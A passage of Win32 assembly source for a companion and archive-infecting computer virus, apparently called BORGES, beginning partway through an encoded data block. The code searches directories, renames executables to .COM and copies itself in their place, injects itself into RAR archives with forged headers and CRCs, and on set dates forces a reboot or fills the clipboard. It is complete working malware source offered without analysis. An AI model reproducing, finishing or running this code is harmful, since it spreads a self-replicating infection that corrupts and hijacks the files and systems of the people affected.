097h,087h,07ah,038h,082h,050h,02ch,03bh,0cdh,09ch,00fh,0ceh,083h,05bh,029h db 081h,071h,038h,0cfh,09ch,082h,05bh,029h,0b9h,0fah,075h,03ch,099h,07bh,038h db 085h,0e0h,03ch,009h,038h,07eh,07ah,0dah,0c6h,016h,0bch,006h,02eh,034h,05eh db 04dh,037h,086h,05fh,02dh,0bdh,0feh,003h,038h,0fbh,03ch,071h,044h,0ffh,086h db 08ah,02ch,0bdh,034h,01ch,018h,0bfh,074h,03eh,018h,083h,0c2h,037h,086h,08ah db 02ch,0bdh,0c7h,02eh,034h,04bh,00fh,085h,03bh,03ch,0cbh,09ah,04dh,0cch,0b9h db 0c3h,0c5h,037h,04ch,00dh,0b9h,0c3h,038h,030h,04ch,013h,0b9h,0c3h,03bh,030h db 04ch,011h,0b9h,0c3h,03eh,030h,04ch,017h,0b9h,0c3h,031h,030h,04ch,015h,0b9h db 0c3h,034h,030h,04ch,01bh,0b9h,0c3h,037h,030h,04ch,019h,0b9h,0c3h,02ah,030h db 04ch,01fh,0feh,03ah,02ah,030h,060h,0c5h,0fbh,08ch,07dh,0d7h,022h,08ch,07bh db 0d7h,02eh,08ch,06bh,0d7h,02ah,08ch,077h,0d7h,036h,08ch,07ah,0d7h,032h,08ch db 07dh,0d7h,03eh,08ch,079h,0d7h,03ah,08ch,06ah,09eh,02ah,030h,0b6h,0e7h,0c0h db 0ffh,08ch,003h,081h,03fh,038h,086h,07ah,02eh,0f5h,01dh,0b3h,02ah,07bh,02eh db 098h,07eh,02ah,0ffh,06bh,06dh,06eh,06bh,0d0h,009h,038h,086h,0c7h,0c3h,080h db 0c3h,0c7h,017h,0e3h,0b6h,024h,07ah,00ah,0e4h,0e9h,0dfh,0e9h,0dfh,0b2h,0f8h db 0b2h,0deh,0b2h,0eah,00ah,0cah,00bh,0bbh,003h,014h,00bh,0abh,005h,014h,071h db 049h,0dah,0bfh,0cah,0c3h,00dh,0c3h,0c7h,063h,066h,065h,063h,0ffh,080h,0f1h db 02bh,0b0h,0f3h,0f3h,068h,06dh,06ah,06bh,087h,007h,010h,00fh,0f1h,00fh,0eah db 00fh,0f8h,0b6h,0f9h,06dh,081h,034h,038h,0c4h,0e9h,0e6h,0e9h,0e4h,04bh,03bh db 0b9h,0ceh,080h,0d1h,00dh,01ch,0bbh,0deh,0c8h,0b5h,03dh,0b5h,06dh,03eh,0bbh db 0fbh,03ch,065h,079h,0bdh,0c1h,03ch,039h,049h,0eeh,063h,062h,065h,060h,0ffh db 026h,06ah,068h,06fh,0a4h,064h,0b8h,0d8h,0c6h,06ch,0a5h,017h,0f8h,0b2h,0e0h db 087h,03ch,03ch,0fdh,00bh,0feh,038h,0f7h,067h,060h,062h,027h,0ffh,0a4h,012h db 0c7h,022h,0a4h,03dh,04bh,03fh,0d1h,0abh,038h,01ah,0b9h,083h,073h,03ch,0dah db 0cbh,04dh,03fh,0d1h,09fh,0cah,01ah,0b9h,043h,02bh,07ch,033h,048h,03bh,0d5h db 0b8h,03ch,0a4h,06ch,06bh,06dh,06ah,06ah,06fh,012h,0feh,03ah,091h,03ch,07eh db 03ah,026h,03ah,027h,032h,03fh,0b1h,04fh,03fh,087h,03fh,038h,085h,003h,03ch db 0cbh,098h,027h,03bh,0d0h,04fh,038h,084h,039h,03fh,013h,0eeh,081h,03dh,068h db 0a0h,016h,0c3h,026h,0a0h,039h,084h,039h,03fh,0a4h,012h,0c7h,022h,0a4h,03dh db 03eh,032h,03fh,012h,0feh,03ah,02ah,030h,05ah,069h,026h,03ah,085h,033h,03ah db 0d4h,043h,0c1h,03fh,023h,065h,084h,031h,03fh,081h,03eh,068h,087h,05bh,02bh db 0a4h,012h,0c7h,022h,0a4h,03dh,080h,035h,03bh,0a0h,016h,0c3h,026h,0a0h,039h db 084h,039h,03fh,081h,03dh,038h,00fh,0eah,087h,05bh,029h,0a4h,012h,0c7h,022h db 0a4h,03dh,03fh,063h,066h,066h,061h,067h,060h,0a1h,0f2h,03eh,038h,03fh,06ah db 053h,050h,05dh,051h,054h,09bh,01ch,068h,05dh,04ah,05dh,05fh,049h,059h,045h db 019h,03fh,026h,03ah,06bh,032h,036h,023h,03fh,00fh,0f8h,0b2h,0e0h,082h,040h db 03ch,087h,033h,010h,099h,09dh,0b2h,0f8h,083h,040h,03ch,080h,050h,028h,097h db 0b4h,0f4h,093h,032h,036h,023h,03fh,083h,02bh,014h,081h,03dh,03ah,084h,068h db 03ch,093h,0b7h,0f9h,097h,0c6h,0fdh,0b9h,0c5h,032h,03eh,04eh,0cdh,00bh,0fch db 0f5h,02fh,080h,036h,03dh,087h,02bh,014h,081h,03dh,068h,00fh,0eah,0f1h,02bh db 00fh,0f8h,0b2h,0f8h,082h,037h,014h,087h,044h,038h,099h,09dh,067h,03fh,023h db 0fbh,06ch,06bh,06dh,06ah,06ah,06fh,069h,026h,03ah,036h,032h,027h,03bh,01eh db 0bch,006h,089h,033h,072h,04dh,02ah,080h,03dh,03ah,087h,08eh,02eh,081h,03dh db 038h,086h,0b8h,03ch,0f5h,02fh,0b9h,083h,073h,03ch,0dah,0cbh,04dh,036h,03fh db 023h,065h,063h,066h,066h,061h,067h,060h,0f3h,01eh,0fah,03eh,095h,038h,074h db 01eh,0fah,03eh,089h,033h,065h,087h,01ch,038h,0d4h,085h,0cch,0d3h,0deh,082h db 0ceh,039h,085h,03eh,03ch,056h,07eh,0dah,0c0h,0d4h,094h,030h,048h,0c3h,0b7h db 0cbh,085h,038h,03dh,082h,0cch,039h,0cfh,057h,0ffh,00fh,013h,03fh,008h,014h db 038h,00dh,011h,03dh,0e3h,03ah,019h,03ah,02eh,023h,0c3h,054h,03eh,037h,034h db 039h,03dh,038h,03ch,098h,00ch,079h,072h,06ch,075h,015h,06ah,071h,06eh,016h db 078h,079h,068h,038h,07fh,070h,077h,074h,075h,06bh,068h,016h,071h,06bh,03ch db 07bh,074h,073h,070h,071h,06fh,06ch,012h,07bh,06ch,06bh,03ch,079h,06ah,068h db 012h,07bh,06eh,07bh,03ch,038h,03ch,0b8h,03ch,038h,03ch,064h,03ch,038h,03ch db 054h,03ch,038h,03ch,07bh,006h,064h,07fh,077h,071h,075h,07dh,076h,078h,016h db 07fh,077h,071h,038h,0b6h,03fh,03ch,0f9h,02ch,039h,03dh,038h,03dh,0a3h,09ch db 091h,02eh,039h,03ch,039h,03ch,038h,004h,044h,0fah,0feh,050h,0c6h,0fah,0feh db 0fah,07ch,03ch,038h,03ch,038h,0c4h,044h,05ah,05eh,052h,0c4h,05ah,05eh,042h db 0c4h,03ch,038h,03ch,038h,004h,044h,0dah,05eh,05eh,058h,05eh,0deh,042h,004h db 03ch,038h,03ch,038h,0cch,000h,020h,076h,0dah,05eh,05ah,05eh,040h,0c0h,03ch db 038h,03ch,038h,044h,0c4h,05ah,052h,0c4h,050h,05eh,05eh,0c0h,040h,03ch,038h db 03ch,038h,040h,0c6h,05eh,058h,054h,0c0h,054h,058h,05ch,0c8h,03ch,038h,03ch db 038h,040h,0d6h,05ah,05ch,05ch,0dah,05ah,056h,0c2h,04eh,03eh,038h,03ch,038h db 07eh,05eh,05ah,05eh,0dbh,046h,05ah,05eh,05ah,07ah,03ch,038h,03ch,038h,024h db 004h,000h,020h,024h,020h,024h,004h,000h,020h,03ch,038h,03ch,038h,03ah,036h db 032h,07eh,05ah,04eh,05ah,05eh,05ah,004h,03ch,038h,03ch,038h,01eh,05eh,0dah db 05eh,048h,040h,050h,0deh,05ah,01ah,03ch,038h,03ch,038h,01ch,058h,0dch,058h db 05ch,05ah,05ah,056h,05ah,0c4h,03ch,038h,03ch,038h,0beh,0fah,0fah,0d6h,0c2h db 0eeh,0eah,0feh,0fah,07ch,03ch,038h,03ch,038h,0beh,0feh,0dah,0ceh,0e2h,0f6h db 0fah,0feh,0fah,07ah,03ch,038h,03ch,038h,024h,004h,052h,05eh,05ah,05eh,05ah db 04eh,000h,020h,03ch,038h,03ch,038h,0cch,044h,052h,05eh,05ah,056h,0c0h,058h db 05ch,078h,03ch,038h,03ch,038h,00ch,044h,0fah,0feh,0fah,0feh,0fah,0eeh,040h db 020h,030h,038h,03ch,038h,0c0h,05eh,05ah,05eh,048h,040h,050h,0deh,05ah,01ah db 03ch,038h,03ch,038h,000h,05eh,05ah,05eh,00eh,020h,030h,01eh,05ah,084h,03ch db 038h,03ch,038h,018h,046h,0e7h,0a1h,024h,020h,024h,020h,024h,004h,03ch,038h db 03ch,038h,07eh,05eh,05ah,05eh,05ah,05eh,05ah,05eh,042h,004h,03ch,038h,03ch db 038h,018h,05eh,05ah,05eh,05ah,05eh,05ah,05eh,000h,020h,03ch,038h,03ch,038h db 0beh,0feh,0fah,0feh,0eah,0eeh,0c2h,0c6h,0d2h,07ch,03ch,038h,03ch,038h,07eh db 05eh,000h,020h,024h,020h,024h,004h,05ah,07ah,03ch,038h,03ch,038h,07eh,05eh db 05ah,004h,024h,020h,024h,020h,024h,004h,03ch,038h,03ch,038h,000h,05eh,07ah db 034h,024h,044h,00ch,05ah,05ah,004h,03ch,038h,0b6h,03fh,03ch,039h,056h,0c9h db 01ch,017h,07fh,018h,03ch,038h,048h,038h,0bch,010h,03ch,09eh,02eh,038h,03ch db 09eh,02eh,038h,03ch,038h,03ch,038h,03ch,038h,0e2h,07dh,01eh,01dh,028h,008h db 034h,038h,03ch,038h,03ch,038h,079h,077h,072h,071h,012h,07bh,073h,075h,05ch db 0d2h,03ch,038h,022h,03fh,03dh,038h,02ch,038h,03ch,062h,0e2h,07dh,0bdh,01dh db 09ah,02ah,03ch,038h,09ah,02ah,03ch,038h,03ch,038h,03ch,038h,03ch,038h,03ch db 038h,03ch,038h,06dh,07eh,073h,073h,012h,07bh,073h,075h,03ch,038h,03ch,038h db 03ch,038h,03ch,000h .CODE BORGES: push offset SystemTimeStruc call GetSystemTime mov ax,word ptr offset [SystemTimeStruc+2] cmp al,9 jne NoFQVbirthday mov ax,word ptr offset [SystemTimeStruc+6] cmp al,17 je Adios NoFQVbirthday: push offset Original push 000000C8h call GetCurrentDirectoryA mov dword ptr [Longitud],eax call GetCommandLineA push eax push offset ParaCorrer call lstrcpyA mov edi,eax Buscar: cmp byte ptr [edi],'.' jz ElPunto inc edi jmp Buscar ElPunto:mov esi,edi inc esi mov dword ptr [Posicion],esi add edi,4 mov byte ptr [edi],00 Carrousell: jmp InfectEXEs Volver: push offset PuntoPunto call SetCurrentDirectoryA push offset Actual push 000000C8h call GetCurrentDirectoryA cmp eax,dword ptr [Longitud] je Salida mov dword ptr [Longitud],eax jmp Carrousell InfectEXEs: push offset Win32FindData push offset Victimas call FindFirstFileA mov dword ptr [SearcHandle1],eax Ciclo: cmp eax,-1 je Salida or eax,eax jnz Continuar jmp InfectRARs Continuar: push offset Hallado push offset Crear call lstrcpyA mov edi,offset Crear SeguirBuscando: cmp byte ptr [edi],'.' jz PuntoEncontrado inc edi jmp SeguirBuscando PuntoEncontrado: inc edi mov dword ptr [edi],0004d4f43h push offset Crear push offset Hallado call MoveFileA push 0 push offset Hallado push offset ParaCorrer+1 call CopyFileA push offset Win32FindData push dword ptr [SearcHandle1] call FindNextFileA jmp Ciclo InfectRARs: push offset Win32FindData push offset Victimas2 call FindFirstFileA mov dword ptr [SearcHandle2],eax Ciclear:cmp eax,-1 je Salida or eax,eax jnz Follow jmp Volver Follow: push 00 push 00000080h push 03 push 00 push 00 push 0c0000000h push offset Hallado ; Abrir el RAR call CreateFileA mov dword ptr [FileHandle],eax push 02 push 00 push 00 ; Puntero al final push eax call SetFilePointer mov edi,offset RARName mov ecx,7 ; Get a random name call Changer mov esi,offset Kuarahy2 mov edi,Size ; Get CRC call CRC32 mov dword ptr [RARCrc32],eax mov esi,offset RARHeader+2 mov edi,HeaderSize-2 ; CRC of the header call CRC32 mov word ptr [RARHeaderCRC],ax push 0 push offset Number push HeaderSize push offset RARHeader ; Write header push dword ptr [FileHandle] call WriteFile mov word ptr [RARHeaderCRC],0 mov word ptr [RARCrc32],0 ; Blank mov word ptr [RARCrc32+2],0 push 0 push offset Number push Size push offset Kuarahy2 ; Drop viruz push dword ptr [FileHandle] call WriteFile push dword ptr [FileHandle] call CloseHandle push offset Win32FindData push dword ptr [SearcHandle2] call FindNextFileA jmp Ciclear FillClipboard: push 0 call OpenClipboard call EmptyClipboard push (offset TextoVentana-offset TituloVentana) push 00000002 ; GMEM_MOVEABLE call GlobalAlloc push eax mov dword ptr [MemHandle],eax call GlobalLock push eax push offset TituloVentana push eax call lstrcpyA push dword ptr [MemHandle] call GlobalUnlock push dword ptr [MemHandle] push 00000001 ; CF_TEXT call SetClipboardData call CloseClipboard jmp Run4theNight Adios: push 00000001 push offset TituloVentana push offset TextoVentana push 0 call MessageBoxA push 0 push 00000002 ; EWX_REBOOT call ExitWindowsEx Salida: push offset Original call SetCurrentDirectoryA mov ax,word ptr offset [SystemTimeStruc+4] cmp al,2 je FillClipboard Run4theNight: push offset ProcessInfo push offset StartupInfo sub eax,eax push eax push eax push 00000010h push eax push eax push eax call GetCommandLineA inc eax push eax Done: mov esi,dword ptr [Posicion] mov dword ptr [esi],0004d4f43h push offset ParaCorrer+1 call CreateProcessA Out: push 0 call ExitProcess CRC32: cld ; Routine extracted from Vecna's push ebx ; Inca virus. Muito brigado! mov ecx,-1 mov edx,ecx NextByteCRC: xor eax,eax xor ebx,ebx lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 NextBitCRC: shr bx,1 rcr ax,1 jnc NoCRC xor ax,08320h xor bx,0edb8h NoCRC: dec dh jnz NextBitCRC xor ecx,eax xor edx,ebx dec di jnz NextByteCRC not edx not ecx pop ebx mov eax,edx rol eax,16 mov ax,cx ret Changer: mov ebx,25 call GetTickCount ; ¥embo random mov edx,dword ptr offset [SystemTimeStruc+6] xor eax,edx xor edx,edx div ebx xchg eax,edx add eax,65 stosb loop Changer ret Ends End BORGES